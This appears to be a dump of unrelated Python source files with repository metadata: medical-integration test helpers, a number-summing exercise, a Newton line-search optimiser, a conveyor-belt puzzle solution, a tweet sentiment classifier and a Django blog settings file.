# delete_doctor(testapp, risar_session, org_id, doctor_id)
edit_doctor(testapp, risar_session, org_id, doctor_id, get_doctor_data_more(org_id, doctor_id))
def mis_to_mr_client(testapp, client_id):
# create_client(testapp, risar_session, get_client_data_required(client_id))
edit_client(testapp, risar_session, client_id, get_client_data_more(client_id))
def mr_make_appointment(testapp, client_id, ticket_id, doctor_id):
is_delete = False
make_appointment(risar_session, get_mr_appointment_data(client_id, ticket_id, doctor_id, is_delete))
def mr_to_mis_sch_ticket(testapp, org_id, doctor_id, client_id, ticket_id):
is_delete = False
send_event_remote(testapp, risar_session, get_sch_ticket_data_required(
is_delete, client_id, ticket_id, org_id, doctor_id
))
# def mr_create_card(testapp, client_id, sch_client_ticket_id=None):
# res = create_card(risar_session, client_id, sch_client_ticket_id)
# card_id = res['result']['card_id']
# return card_id
def mr_to_mis_card(testapp, client_id, card_id):
is_create = False
request_local(testapp, risar_session, get_send_to_mis_card_data(client_id, card_id, is_create))
# def mr_create_first_checkup(testapp, card_id):
# res = create_first_checkup(risar_session, card_id, get_first_checkup_data_required())
# checkup_id = res['result']['checkup_id']
# return checkup_id
def mr_to_mis_first_ticket25(testapp, card_id, checkup_id):
is_create = True
request_local(testapp, risar_session, get_send_to_mis_first_ticket25_data(card_id, checkup_id, is_create))
def mr_to_mis_second_ticket25(testapp, card_id, checkup_id):
is_create = True
request_local(testapp, risar_session, get_send_to_mis_second_ticket25_data(card_id, checkup_id, is_create))
def mr_to_mis_pc_ticket25(testapp, card_id, checkup_id):
is_create = True
request_local(testapp, risar_session, get_send_to_mis_pc_ticket25_data(card_id, checkup_id, is_create))
def mr_to_mis_first_checkup(testapp, card_id, checkup_id):
is_create = True
request_local(testapp, risar_session, get_send_to_mis_first_checkup_data(card_id, checkup_id, is_create))
def mr_to_mis_second_checkup(testapp, card_id, checkup_id):
is_create = True
request_local(testapp, risar_session, get_send_to_mis_second_checkup_data(card_id, checkup_id, is_create))
def mr_to_mis_pc_checkup(testapp, card_id, checkup_id):
is_create = True
request_local(testapp, risar_session, get_send_to_mis_pc_checkup_data(card_id, checkup_id, is_create))
def mr_to_mis_measures(testapp, card_id):
is_create = True
request_local(testapp, risar_session, get_send_to_mis_measures_data(card_id, is_create))
def mis_to_mr_meas_sp_checkup(testapp, card_id, org_id, doctor_id, event_measure_id, sp_checkup_id):
create_sp_checkup(testapp, risar_session, card_id, get_sp_checkup_data_required(
org_id, doctor_id, event_measure_id, sp_checkup_id))
# edit_sp_checkup(testapp, risar_session, card_id, sp_checkup_id, get_sp_checkup_data_more(
# org_id, doctor_id, event_measure_id, sp_checkup_id))
def mis_to_mr_meas_hosp(testapp, card_id, org_id, doctor_id, event_measure_id, meas_hosp_id):
create_hospitalization(testapp, risar_session, card_id, get_meas_hosp_data_required(
org_id, doctor_id, event_measure_id, meas_hosp_id))
edit_hospitalization(testapp, risar_session, card_id, meas_hosp_id, get_meas_hosp_data_more(
org_id, doctor_id, event_measure_id, meas_hosp_id))
def mis_to_mr_meas_research(testapp, card_id, org_id, doctor_id, event_measure_id, meas_research_id):
create_research(testapp, risar_session, card_id, get_meas_research_data_required(
org_id, doctor_id, event_measure_id, meas_research_id))
# edit_research(testapp, risar_session, card_id, meas_research_id, get_meas_research_data_more(
# org_id, doctor_id, event_measure_id, meas_research_id))
def mis_to_mr_first_ticket25(testapp, card_id, org_id, doctor_id, checkup_id):
edit_checkup_first_ticket25(testapp, risar_session, card_id, checkup_id, get_first_ticket25_data_more(
org_id, doctor_id, checkup_id))
def mis_to_mr_childbirth(testapp, card_id, org_id, doctor_id):
# create_childbirth(testapp, risar_session, card_id, get_childbirth_data_required(org_id, doctor_id))
edit_childbirth(testapp, risar_session, card_id, get_childbirth_data_more(org_id, doctor_id))
def mr_to_mis_epicrisis(testapp, card_id):
is_create = False
request_local(testapp, risar_session, get_send_to_mis_epicrisis_data(card_id, is_create))
|
[
"paschenko@bars-open.ru"
] |
paschenko@bars-open.ru
|
c19d323dd79ed8200a36279528eb8fd77c5d502e
|
b3122fec6858e1b4474889bc0b58cbdbec40ac34
|
/DZ5/DZ5_5.py
|
bb40fae277a8a97cfcacfb80f5a0604210a86293
|
[] |
no_license
|
Mehalich/git-geekbrains
|
edb05ceb7643e02d1334d118d6e304720a266066
|
e6833de99b5c2c37a4d16b7856fa85ba1f17117a
|
refs/heads/main
| 2023-04-30T00:54:10.232243
| 2021-05-16T16:51:52
| 2021-05-16T16:51:52
| 359,473,465
| 1
| 0
| null | 2021-05-16T16:54:21
| 2021-04-19T13:40:34
|
Python
|
UTF-8
|
Python
| false
| false
| 536
|
py
|
"""
5. Создать (программно) текстовый файл, записать в него программно набор чисел, разделенных пробелами.
Программа должна подсчитывать сумму чисел в файле и выводить ее на экран.
"""
f = open("DZ5_5.txt", "w+")
f.write("1 2 3 4 5 6 7 8 9 0")
f.seek(0)
line = f.readlines()
result = 0
line = str(line[0])
line = line.split()
for step in line:
result += int(step)
print(result)
f.close()
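# --- Editor's illustrative sketch: the same task in idiomatic form, with a
# context manager and the built-in sum() (uses only the file created above):
with open("DZ5_5.txt") as fh:
    print(sum(int(token) for token in fh.read().split()))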
|
[
"yakovlev_mv@mail.ru"
] |
yakovlev_mv@mail.ru
|
4fb0d462d89a6686b3a67fd657cc1c0eb304bb7f
|
38d1ef01184bbdb3898b8cf495eeee48eaa1a30a
|
/Newton_Optimization/newton_linesearch.py
|
537cf2deab73ebdd2706c24882b81d41bace2821
|
[] |
no_license
|
LenCewa/MasterThesis
|
39c86c8ab3c752fedc445fea14368bbd74ca8f3a
|
b2d4d67b7ae2f363dd627ecb4355de1ae6ef04a3
|
refs/heads/master
| 2020-06-16T15:47:29.971151
| 2020-04-15T09:29:43
| 2020-04-15T09:29:43
| 195,626,164
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,840
|
py
|
import numpy as np
import matplotlib.pyplot as plt
import jax.numpy as jnp  # jnp is used throughout; made explicit in case the star imports below don't provide it
from Fourier import *
from util import *
# Init Params for Fourier-Classes
N = 5
omega = 1
T = (2 * jnp.pi) / omega
step_size = 0.001
iterations = 450
fourier = Fourier(T, omega, step_size, N, iterations, [], [])
d_fourier = dFourier(T, omega, step_size, N, iterations, [], [])
dd_fourier = ddFourier(T, omega, step_size, N, iterations, [], [])
def L(x, y):
fx = fourier.predict(fourier.coefficients, x)
return np.abs(y - fx)**2
def dL(x, y):
fx = fourier.predict(fourier.coefficients, x)
dfx = d_fourier.predict(fourier.coefficients, x)
return 2 * (y - fx) * (-dfx)
def ddL(x, y):
fx = fourier.predict(fourier.coefficients, x)
dfx = d_fourier.predict(fourier.coefficients, x)
ddfx = dd_fourier.predict(fourier.coefficients, x)
return 2 * (dfx**2 - (y - fx) * ddfx)
def newton_optimization_linesearch(y, x0, iterations, alpha0, damping0):
res = [jnp.array([x0])]
err = []
alpha = alpha0
damping = damping0
roh = [1.2, 0.5, 1, 0.5, 0.01]
for k in range(iterations):
x = res[k]
fx = fourier.predict(fourier.coefficients, x)
dfx = dL(x,y)
ddfx = ddL(x,y)
i = 0
err += [np.linalg.norm(y - fx)]
if err[k] < 1e-3: break
d = -dfx / (ddfx + damping)
fx_alphad = fourier.predict(fourier.coefficients, x + alpha * d)
while fx_alphad > (fx + roh[4]*dfx * alpha * d):
print("Iteration: ", k , " while-loop: ", i)
print("f(x + alpha * d) = ", fx_alphad, " > f(x) + r*f'(x) = ", fx + roh[4]*dfx)
i += 1
alpha = roh[1]*alpha
# Optionally:
damping = roh[2]*damping
d = -dfx / (ddfx + damping)
fx_alphad = fourier.predict(fourier.coefficients, x + alpha * d)
x = x + alpha * d
res += [x]
alpha = np.min([roh[0], alpha, 1])
        # Optionally:
damping = roh[3] * damping
return res, err
t = jnp.linspace(0, 10*np.pi, num=1000)
x0 = 2
y0 = fourier.predict(fourier.coefficients, x0)
const_y0 = np.full(len(t), y0)
f = fourier.batched_predict(fourier.coefficients, t)
df = d_fourier.batched_predict(fourier.coefficients, t)
ddf = dd_fourier.batched_predict(fourier.coefficients, t)
const_0 = np.full(len(t), 0)
# Run Newton Optimization
steps = 20
x_start = 1.5
alpha0 = 1
damping0 = 0.999
res, err = newton_optimization_linesearch(y0[0], x_start, steps, alpha0, damping0)
fx_t = []
ex_t = []
for x in res:
pred = fourier.predict(fourier.coefficients, x)[0]
fx_t += [pred]
ex_t += [(y0 - pred)**2]
print(res)
print(err)
L = L(t, y0)
dL = dL(t, y0)
ddL = ddL(t, y0)
fig, axs = plt.subplots(3, 2)
fig.suptitle("Newton Line Search: x* = " + str(x0) + ", y* = " + str(y0[0]) + ", x0 = " + str(x_start) + " ||| steps = " + str(steps))
axs[0, 0].plot(t, f)
axs[0, 0].plot(t, const_y0, 'tab:red')
axs[0, 0].plot(res, fx_t, 'k.-')
axs[0, 0].plot(res[-2], fx_t[-2], 'ro')
axs[0, 0].plot(res[-1], fx_t[-1], 'g*')
axs[0, 0].set_title('f and y*')
axs[1, 0].plot(t, df, 'tab:orange')
axs[1, 0].set_title('df')
axs[2, 0].plot(t, ddf, 'tab:green')
axs[2, 0].set_title('ddf')
axs[0, 1].plot(t, L)
axs[0, 1].plot(t, const_0, 'tab:red')
axs[0, 1].plot(res, ex_t, 'k.-')
axs[0, 1].plot(res[-2], ex_t[-2], 'ro')
axs[0, 1].plot(res[-1], ex_t[-1], 'g*')
axs[0, 1].set_title('L')
axs[1, 1].plot(t, dL, 'tab:orange')
axs[1, 1].plot(t, const_0, 'tab:red')
axs[1, 1].set_title('dL')
axs[2, 1].plot(t, ddL, 'tab:green')
axs[2, 1].set_title('ddL')
for ax in axs.flat:
ax.set(xlabel='x-label', ylabel='y-label')
# Hide x labels and tick labels for top plots and y ticks for right plots.
# for ax in axs.flat:
# ax.label_outer()
plt.show()
#plt.savefig("LineSearchFigs/Newton_LineSearch_x0=" + str(x_start) + ".png")
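# --- Editor's illustrative sketch: the core scheme above (a damped Newton
# step plus backtracking until an Armijo-style condition holds) distilled to
# a self-contained scalar routine. All names and constants here are local
# choices mirroring the roles of roh[] above, not values from this repo.
def newton_backtracking(f, df, ddf, x, steps=50, alpha=1.0, damping=1e-3,
                        shrink=0.5, armijo=0.01, tol=1e-8):
    for _ in range(steps):
        g, h = df(x), ddf(x)
        if abs(g) < tol:
            break
        d = -g / (h + damping)                    # damped Newton direction
        while f(x + alpha * d) > f(x) + armijo * g * alpha * d:
            alpha *= shrink                       # backtrack until sufficient decrease
        x = x + alpha * d
        alpha = min(1.2 * alpha, 1.0)             # cautiously re-grow the step size
    return x

print(newton_backtracking(lambda v: (v - 2.0)**4,
                          lambda v: 4.0 * (v - 2.0)**3,
                          lambda v: 12.0 * (v - 2.0)**2, 5.0))  # ~2.0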
|
[
"len13@hotmail.de"
] |
len13@hotmail.de
|
832a298328bc29b34d0110a3029f906ad483a34d
|
37c3b81ad127c9e3cc26fa9168fda82460ca9bda
|
/Baekjoon/boj_20055_컨베이어 벨트 위의 로봇.py
|
dfdb3152402dc2cfac4c545e7cd087fba933dcf0
|
[] |
no_license
|
potomatoo/TIL
|
5d85b69fdaed68966db7cfe2a565b7c64ed3e816
|
395dc190fa13e5ed036e1e3c7d9e0bc2e1ee4d6c
|
refs/heads/master
| 2021-07-08T16:19:40.410097
| 2021-04-19T02:33:40
| 2021-04-19T02:33:40
| 238,872,774
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 751
|
py
|
from collections import deque

def work():
    """Simulate BOJ 20055 (robots on a conveyor belt) until K cells wear out."""
    global cnt
    while True:
        # 1. rotate the belt together with the robots riding it
        board.rotate(1)
        robot.rotate(1)
        robot[N-1] = 0  # a robot on the last cell steps off
        # 2. move robots forward where the next cell is free and still durable
        for i in range(N-2, -1, -1):
            if robot[i] and not robot[i+1] and board[i+1] > 0:
                board[i+1] -= 1
                robot[i+1] = 1
                robot[i] = 0
        robot[N-1] = 0  # step off again after moving
        # 3. load a new robot onto cell 0 if it still has durability
        if not robot[0] and board[0] > 0:
            board[0] -= 1
            robot[0] = 1
        # 4. stop once K or more cells have durability 0
        flag = 0
        for i in range(len(board)):
            if board[i] == 0:
                flag += 1
        if flag >= K:
            break
        cnt += 1

N, K = map(int, input().split())
board = deque(map(int, input().split()))
cnt = 1
robot = deque([0] * len(board))
work()
print(cnt)
|
[
"duseh73@gmail.com"
] |
duseh73@gmail.com
|
7951551b827a4fe78a0de05909e4bf7b4a989c18
|
34dd52bca544fd483606667fd9f867d6af68ef28
|
/exercise2/classification05.py
|
5146516b8e14e60c85d27ad8f4ef7e39f92cd66d
|
[] |
no_license
|
Anderbone/CS918NaturalLanguageProcessing
|
8e68bd4a61758c2f127a344152fc1ad74f972e4c
|
ef1e68685e85e76354040c7359c2f29b0da7eff6
|
refs/heads/master
| 2020-05-24T18:15:00.075093
| 2019-05-18T21:26:42
| 2019-05-18T21:26:42
| 187,406,366
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,174
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import testsets
import evaluation
import twokenize
import sklearn.feature_extraction
from nltk.classify.scikitlearn import SklearnClassifier
import sklearn
import pandas as pd
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
import textPreprocessor01
import nltk
from nltk.stem import *
from nltk.probability import FreqDist
from nltk.corpus import sentiwordnet as swn
from gensim.models import word2vec
# import word2vecReader
from sklearn.naive_bayes import GaussianNB, MultinomialNB
from sklearn.pipeline import Pipeline
from sklearn import svm
from sklearn.externals import joblib
from sklearn.feature_extraction import DictVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn import preprocessing
import pandas as pd
from sklearn.preprocessing import StandardScaler
from sklearn import tree
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
# TODO: load training data
def read_training_data(training_data):
id_gts = {}
with open(training_data, 'r', encoding='utf-8') as f:
for line in f:
fields = line.split('\t')
tweetid = fields[0]
gt = fields[1]
content = fields[2].strip()
id_gts[tweetid] = gt, content
return id_gts
# traindic = read_training_data('twitter-training-data1.txt')
# traindic = read_training_data('twitter-training-data_small.txt')
traindic = read_training_data('twitter-training-data.txt')
# input here
def preprocess(tdic):
new_dic = {}
for line in tdic:
id = line
gt = tdic[line][0]
raw = ' '.join(twokenize.tokenizeRawTweetText(tdic[line][1]))
text = twokenize.normalizeTextForTagger(raw)
text_tk = twokenize.tokenize(text)
telist = []
for word in text_tk:
word = word.lower()
ps = nltk.stem.PorterStemmer()
word = ps.stem(word)
telist.append(word)
newtext = ' '.join(telist)
# print(newtext)
newtext = textPreprocessor01.replaceall(newtext)
new_dic[id] = gt, newtext
return new_dic
# print(new_dic)
def get_train_corpus(new_dic):
traincorpus = []
for line in new_dic:
traincorpus.append(new_dic[line][1])
return traincorpus
def get_split_corpus(new_dic):
split_traincorpus = []
for line in new_dic:
split_traincorpus.append(new_dic[line][1].split())
return split_traincorpus
# tdic = read_training_data('twitter-training-data.txt')
# print(tdic)
# for i in tdic:
# print(i) #id
# print(tdic[i])
# print(tdic[i][0]) # gt. positive/negative
# print(tdic[i][1]) # content
# print(corpus)
# print(split_corpus)
# TODO extract features
def get_vect():
vect = CountVectorizer(stop_words='english' ,lowercase=True)
# vect = CountVectorizer(stop_words='english', min_df= ,lowercase=True)
# vectorizer = CountVectorizer(stop_words='english', ngram_range=(1, 2))
X = vect.fit_transform(train_corpus)
return vect, X
def get_train_ngrams():
# vectorizer = CountVectorizer(stop_words='english')
# vect = CountVectorizer(stop_words='english')
# # vectorizer = CountVectorizer(stop_words='english', ngram_range=(1, 2))
# X = vect.fit_transform(corpus)
# print(vectorizer.vocabulary_)
X = get_vect()[1]
# print(vectorizer.vocabulary_.keys())
# print('ngram----')
# print(X.todense())
# print(len(X.todense()))
# X.todense()
# print(X.toarray())
return np.array(X.todense())
def get_test_ngrams(corpus):
vect = get_vect()[0]
X = vect.transform(corpus)
b = X.todense()
return np.array(b)
def get_tfidf(corpus):
# vectorizer = CountVectorizer(stop_words='english')
# vectorizer = CountVectorizer(stop_words='english', ngram_range=(1, 2))
vect = get_vect()[0]
tfidf = TfidfVectorizer(vocabulary=list(vect.vocabulary_.keys()), min_df=0.6, lowercase=True, stop_words='english')
tfs = tfidf.fit_transform(corpus)
# X = vect.fit_transform(corpus)
# print(vectorizer.vocabulary_)
# print(vectorizer.vocabulary_.keys())
tt = tfs.todense()
# print('tfid..')
# print(len(tt))
return np.array(tt)
# maybe it's wrong
def wordembedding(split_corpus):
# model = word2vec.Word2Vec(sentences, \
# workers=num_workers, \
# size=num_features, \
# min_count=min_word_count, \
# window=context,
# sample=downsampling)
model = word2vec.Word2Vec(split_corpus, size=50, min_count=1)
# To make the model memory efficient
model.init_sims(replace=True)
# Saving the model for later use. Can be loaded using Word2Vec.load()
model_name = "wordembedding_features"
model.save(model_name)
# print(model['may'])
# print('word embedding --------------')
# print(model.wv.syn0)
# print(model.wv.vocab)
# print(len(model.wv.vocab))
# print(model.wv.index2word)
print(len(model.wv.index2word))
print(len(model.wv.syn0))
# right here
def word_embedding2(split_corpus):
# print('word embedding2 --------------------')
all = []
for i in split_corpus:
# print(i)
model = word2vec.Word2Vec([i], size=300, min_count=1)
# print(model.vocabulary)
# print(model.wv.vocab)
# s = model.wv.syn0
s = model.wv.vectors
ans = list(map(sum, zip(*s))) # sum of them
all.append(ans)
return np.array(all)
def senti_bi_lexicon(split_corpus):
def inputfile(file):
with open(file, 'r') as my_file:
words = [every_line.rstrip() for every_line in my_file]
return words
def count_p_n(mylist):
pos_num = 0
neg_num = 0
positive = inputfile('positive-words.txt')
negative = inputfile('negative-words.txt')
p_dic = FreqDist(positive)
n_dic = FreqDist(negative)
for word in mylist:
pos_num += p_dic[word]
neg_num += n_dic[word]
return pos_num, neg_num
P_N = []
for line in split_corpus:
p_num_all = n_num_all = 0
p_n_num = count_p_n(line)
p_num_all += p_n_num[0]
n_num_all += p_n_num[1]
P_N.append([p_num_all, n_num_all])
# print('sent..')
# print(len(P_N))
return np.array(P_N)
def get_url(split_corpus):
url = []
for i in split_corpus:
num = i.count('URLLINK')
url.append([num])
# print(url)
# print(len(url))
return np.array(url)
def get_mention(split_corpus):
men = []
for i in split_corpus:
num = i.count('USERMENTION')
men.append([num])
# print(url)
# print(len(url))
return np.array(men)
def get_face(split_corpus):
face = []
for i in split_corpus:
numi = i.count('HAPPYFACE')
numj = i.count('SADFACE')
face.append([numi, numj])
# print(url)
# print(len(url))
return np.array(face)
newdic = preprocess(traindic)
train_corpus = get_train_corpus(newdic)
split_corpus = get_split_corpus(newdic)
# print(split_corpus)
F1 = get_train_ngrams()
F2 = get_tfidf(train_corpus)
F3 = senti_bi_lexicon(split_corpus)
# print(F3)
F4 = word_embedding2(split_corpus)
# print(F4)
F5 = get_url(split_corpus)
# print(F5)
F6 = get_mention(split_corpus)
F7 = get_face(split_corpus)
# print(F7)
# print(F7)
# X = np.concatenate((F3, F4, F5, F7), axis=1)
# X = np.concatenate((F3, F1, F5, F7), axis=1)
# print(X)
# labels_to_array = {"positive": 1, "negative": -1, "neutral": 0}
labels_to_array = {"positive": 0, "negative": 2, "neutral": 1}
labels = [labels_to_array[newdic[tweet][0]] for tweet in newdic]
# print(labels)
# print('5.Y..')
Y = np.array(labels)
# X3 = F5
# print(F3)
# X = F1
# X = F2
# X = F4
# X5 = F5
# X35 = np.concatenate((X3, X5), axis=1)
# X = F5
# X = F6
# print(F5)
# print(F6)
# X = np.concatenate((F1, F2, F3, F4, F5, F6, F7), axis=1)
# X = np.concatenate((F1, F3), axis=1)
# X = F7
for classifier in ['MNB','Naive Bayes', 'Decision Tree', 'Logistic Regression', 'Random Forest', 'KNN']:
# for classifier in ['Naive Bayes', 'Decision Tree', 'Logistic Regression', 'Random Forest', 'KNN']:
# You may rename the names of the classifiers to something more descriptive
if classifier == 'Naive Bayes':
print('Training ' + classifier)
# TODO: extract features for training classifier1
# TODO: train sentiment classifier1
# X = F1
# Y = Y.reshape(Y.size, 1)
X = np.concatenate((F3, F5, F4, F7), axis=1)
model = GaussianNB()
model.fit(X, Y)
# vec = DictVectorizer(sparse=False)
# svm_clf = svm.SVC(kernel='linear')
# model = Pipeline([('vectorizer', vec), ('svm', svm_clf)])
# model = svm.SVC()
elif classifier == 'MNB':
print('Training ' + classifier)
# TODO: extract features for training classifier3
# TODO: train sentiment classifier3
# model = SklearnClassifier(MultinomialNB())
# model.train(X)
X = F1
# base_model = MultinomialNB(alpha=1)
# model = OnevsRestClassifier(base_model).fit(X,Y)
model = MultinomialNB(alpha=1, class_prior=None, fit_prior=True)
# model.fit(np.array(X), np.array(Y))
# print(X)
model.fit(X, Y)
# joblib.dump(model, 'F3_and_SVM.pkl')
elif classifier == 'Decision Tree':
print('Training ' + classifier)
# TODO: extract features for training classifier2
# TODO: train sentiment classifier2
# X = F3
X = np.concatenate((F3, F4, F7), axis=1)
model = tree.DecisionTreeClassifier()
model.fit(X, Y)
# lr = Pipeline([('sc', StandardScaler()),
# ('clf', LogisticRegression())])
# y_hat = lr.predict(x_test)
# y_hat = y_hat.reshape(x1.shape)
elif classifier == 'Logistic Regression':
print('Training ' + classifier)
# TODO: extract features for training classifier3
# TODO: train sentiment classifier3
X = np.concatenate((F3, F4,F5, F7), axis=1)
model = LogisticRegression()
# model.fit(x, y.ravel())
model.fit(X, Y)
elif classifier == 'Random Forest':
print('Training ' + classifier)
# TODO: extract features for training classifier3
# TODO: train sentiment classifier3
model = RandomForestClassifier(n_estimators=100, random_state=0)
# forest = RandomForestClassifier(criterion='entropy',
# n_estimators = 10,
# random_state = 1,
# n_jobs = 2)
X = F2
model.fit(X, Y)
elif classifier == 'KNN':
print('Training ' + classifier)
# TODO: extract features for training classifier3
# TODO: train sentiment classifier3
model = KNeighborsClassifier(n_neighbors=5, p=2)
# model = KNeighborsClassifier(n_neighbors=5, p=2, metric='minkowski')
X = F3
model.fit(X, Y)
# mymodel = model
for testset in testsets.testsets:
# TODO: classify tweets in test set
# if testset == 'twitter-test1.txt':
test = read_training_data(testset)
        testdic = preprocess(test)
t_corpus = get_train_corpus(testdic)
ts_corpus = get_split_corpus(testdic)
tF1 = get_test_ngrams(t_corpus)
tF2 = get_tfidf(t_corpus)
tF3 = senti_bi_lexicon(ts_corpus)
tF4 = word_embedding2(ts_corpus)
tF5 = get_url(ts_corpus)
tF6 = get_mention(ts_corpus)
tF7 = get_face(ts_corpus)
if classifier == 'Naive Bayes':
Xt = np.concatenate((tF3, tF4, tF5, tF7), axis=1)
elif classifier == 'MNB':
Xt = tF1
elif classifier == 'Logistic Regression':
Xt = np.concatenate((tF3, tF4, tF5, tF7), axis=1)
# Xt = tF4
elif classifier == 'KNN':
Xt = tF3
elif classifier == 'Decision Tree':
Xt = np.concatenate((tF3, tF7, tF4), axis=1)
elif classifier == 'Random Forest':
Xt = tF2
# ans_num = model.predict(t_F3)
# model = joblib.load('F3_and_SVM.pkl')
# ans_num = model.predict(t_F3)
# ans_num = model.predict(t_F5)
# Xt = np.concatenate((tF1, tF2, tF3, tF4, tF5, tF6), axis=1)
# Xt = np.concatenate((tF1, tF2, tF3, tF4, tF5, tF6, tF7), axis=1)
# Xt = np.concatenate((tF1, tF3, tF5, tF6, tF7), axis=1)
# Xt = np.concatenate((tF3, tF1, tF5, tF7), axis=1)
# Xt = np.concatenate((tF1), axis=1)
# Xt = tF7
# Xt = tF1
ans_num = model.predict(Xt)
# ans_num = model.predict(t_F1)
# ans_num = model.predict(t_F2)
# # print(ans)
# # print(len(ans))
array_to_labels = {0: "positive", 2: "negative", 1: "neutral"}
labels = [array_to_labels[i] for i in ans_num]
# # print(labels)
# # ans_dic = {}
predictions = dict(zip(list(testdic.keys()), labels))
# print(ans_dictionary)
# predictions = {'163361196206957578': 'neutral', '768006053969268950': 'neutral', '742616104384772304': 'neutral', '
# 102313285628711403': 'neutral', '653274888624828198': 'neutral'}
# TODO: Remove this line, 'predictions' should be populated with the outputs of your classifier
# predictions = ans_dictionary
evaluation.evaluate(predictions, testset, classifier)
evaluation.confusion(predictions, testset, classifier)
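# --- Editor's aside: Pipeline is imported above but never used; the
# bag-of-words + classifier pairing could be packaged like this (sketch,
# untuned parameters):
# text_clf = Pipeline([
#     ('vect', CountVectorizer(stop_words='english', lowercase=True)),
#     ('clf', LogisticRegression()),
# ])
# text_clf.fit(train_corpus, Y)       # raw strings in, labels out
# preds = text_clf.predict(t_corpus)  # identical preprocessing re-applied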
|
[
"noreply@github.com"
] |
noreply@github.com
|
5defb566e1ea2c00089fc94bb725b27db106978b
|
c092a30eb6e977cd021cb5d2670c5d3b4a3ac062
|
/markliu/settings.py
|
27f0f08471f7ec9cf0430cc6c6cdaba2053df9bd
|
[] |
no_license
|
joskid/personal-django-blog
|
28a1789034f92091e622079b583d3aa1e33c0c8c
|
917a4182e9af49967280608f6a4378c8b386bb91
|
refs/heads/master
| 2020-12-25T02:30:36.280993
| 2012-12-14T15:52:59
| 2012-12-14T15:52:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,043
|
py
|
# Django settings for the blog markliu.me
import os
import socket
import sys
import dj_database_url
# Test to see if local_settings exists. If it doesn't exist then this is on the live host.
if os.path.isfile('local_settings.py'):
LIVEHOST = False
else:
LIVEHOST = True
USE_STATICFILES = False
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
ADMINS = (
('Mark Liu', 'markwayneliu@gmail.com'),
)
MANAGERS = ADMINS
if LIVEHOST:
DEBUG = os.environ.get('DJANGO_DEBUG', '').lower() == "true"
# Heroku settings: https://devcenter.heroku.com/articles/django#database-settings
DATABASES = {'default': dj_database_url.config(default='postgres://localhost')}
# Django storages
AWS_STORAGE_BUCKET_NAME = os.environ['AWS_STORAGE_BUCKET_NAME']
AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']
AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']
USE_STATICFILES = True
S3_URL = 'https://s3.amazonaws.com/{0}/'.format(AWS_STORAGE_BUCKET_NAME)
# URL prefix for static files.
STATIC_URL = S3_URL
GOOGLE_WEBMASTER_KEY = os.environ['GOOGLE_WEBMASTER_KEY']
SECRET_KEY = os.environ['SECRET_KEY']
DISQUS_API_KEY = os.environ['DISQUS_API_KEY']
DELICIOUS_PASSWORD = os.environ['DELICIOUS_PASSWORD']
MEDIA_ROOT = ''
MEDIA_URL = ''
else:
DEBUG = True
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(PROJECT_ROOT, 'mark-liu.db'),
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
}
}
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'media/')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = 'http://127.0.0.1:8000/media/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/admin/'
STATIC_URL = '/media/'
# Django storages
AWS_ACCESS_KEY_ID = '' # To use this to upload files to S3, this should be defined in local_settings.py
AWS_SECRET_ACCESS_KEY = '' # To use this to upload files to S3, this should be defined in local_settings.py
if 'collectstatic' in sys.argv:
USE_STATICFILES = True
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, './media/'),
)
TEMPLATE_DEBUG = DEBUG
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Make this unique, and don't share it with anybody.
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
]
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Debug toolbar. This goes after any middleware that encodes the response's content.
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
ROOT_URLCONF = 'markliu.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(PROJECT_ROOT, 'templates/'),
)
INSTALLED_APPS = (
'django.contrib.staticfiles',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.markup',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.admin',
'django.contrib.flatpages',
'south',
'coltrane',
'tagging',
'debug_toolbar',
'disqus',
'django_twitter_tags',
'google_webmaster',
'django_posterous',
)
# INTERNAL_IPS is used for django-debug-toolbar.
#INTERNAL_IPS = ('127.0.0.1',)
# For django-debug-toolbar.
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
}
DELICIOUS_USER = 'mliu7'
DISQUS_WEBSITE_SHORTNAME = 'markliusblog'
DJANGO_POSTEROUS_SITE_NAME = 'wiscospike' # The site name of your posterous site (yoursitename.posterous.com)
DJANGO_POSTEROUS_BLOG_MODULE = 'coltrane' # The module of your django blog
